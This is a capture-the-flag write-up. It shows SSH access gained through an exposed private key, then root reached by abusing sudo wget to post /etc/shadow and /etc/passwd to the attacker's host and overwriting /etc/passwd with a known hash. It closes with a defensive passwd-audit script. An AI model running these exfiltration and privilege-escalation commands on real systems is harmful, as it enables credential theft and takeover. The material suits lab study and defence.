Room Link:
Scanning
Initial Scan
Kali
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
The main page of the site was just an Apache default page, but in the source we can see a comment made by someone named jessie.
Ran gobuster and found a site under sitemap; nothing really interesting about it when browsing.
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster wasn't really able to find anything interesting.
Kali
gobuster dir -u http://$VICTIM/sitemap/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Ran dirb with defaults and it found a .ssh folder which has an id_rsa, so I downloaded and used it.
Kali
dirb http://$VICTIM/sitemap/
Kali
chmod 600 id_rsa
ssh -v -i id_rsa jessie@$VICTIM
Victim
I tried cracking jessie's hash, as I would then be able to run any command with sudo, but I couldn't crack it; documenting it anyway.
Victim
sudo -u root /usr/bin/wget --post-file=/etc/shadow $KALI:4444
sudo -u root /usr/bin/wget --post-file=/etc/passwd $KALI:4444
Victim
unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Instead I changed the passwd file. I first downloaded it to Kali and changed the line for jessie so their password is now '123'. Then I uploaded it back and just became root.
Victim
sudo -u root /usr/bin/wget --post-file=/etc/passwd 10.10.65.21:4444
Kali
Line to change
jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash
Kali
python2 -m SimpleHTTPServer 81
Victim
sudo wget http://$KALI:81/passwd -O /etc/passwd
sudo -i
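
A defender-side check for the passwd change described above, as an added example that is not part of the original writeup: an entry whose second field holds a hash instead of `x` authenticates against that hash rather than /etc/shadow, so an audit can flag it. The function names and the sample file are constructed for illustration; only the jessie line is taken from this page.

```python
# Added example: audit an /etc/passwd-style file for password fields that bypass /etc/shadow.
# Function names and the scheme table are this example's own (hypothetical helpers).
CRYPT_SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
                 "y": "yescrypt", "2a": "bcrypt", "2b": "bcrypt"}

def classify_password_field(field):
    """Return (status, detail) for the second field of a passwd entry."""
    if field == "x":
        return "shadow", ""            # normal: the hash lives in /etc/shadow
    if field == "":
        return "empty", ""             # no password required at all
    if field[0] in "*!":
        return "locked", ""            # account cannot log in with a password
    if field.startswith("$"):
        parts = field.split("$")       # "$1$salt$hash" -> ["", "1", "salt", "hash"]
        scheme = CRYPT_SCHEMES.get(parts[1], "unknown") if len(parts) > 2 else "unknown"
        return "inline-hash", scheme
    return "inline-hash", "legacy-or-unknown"

def audit_passwd(text):
    """Return a list of (line number, user, issue) for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        status, detail = classify_password_field(pw)
        if status == "inline-hash":
            findings.append((lineno, user, f"password hash stored in passwd ({detail})"))
        elif status == "empty":
            findings.append((lineno, user, "empty password field"))
        if uid == "0" and user != "root":
            findings.append((lineno, user, "non-root account with UID 0"))
    return findings

# Constructed sample file; the jessie line is the modified entry shown on this page.
SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash
svc::0:0:constructed:/:/bin/sh
"""

if __name__ == "__main__":
    for lineno, user, issue in audit_passwd(SAMPLE):
        print(f"line {lineno}: {user}: {issue}")
```

Run against a copy of /etc/passwd from a host, any finding for an interactive account is worth comparing with a known-good baseline of the file.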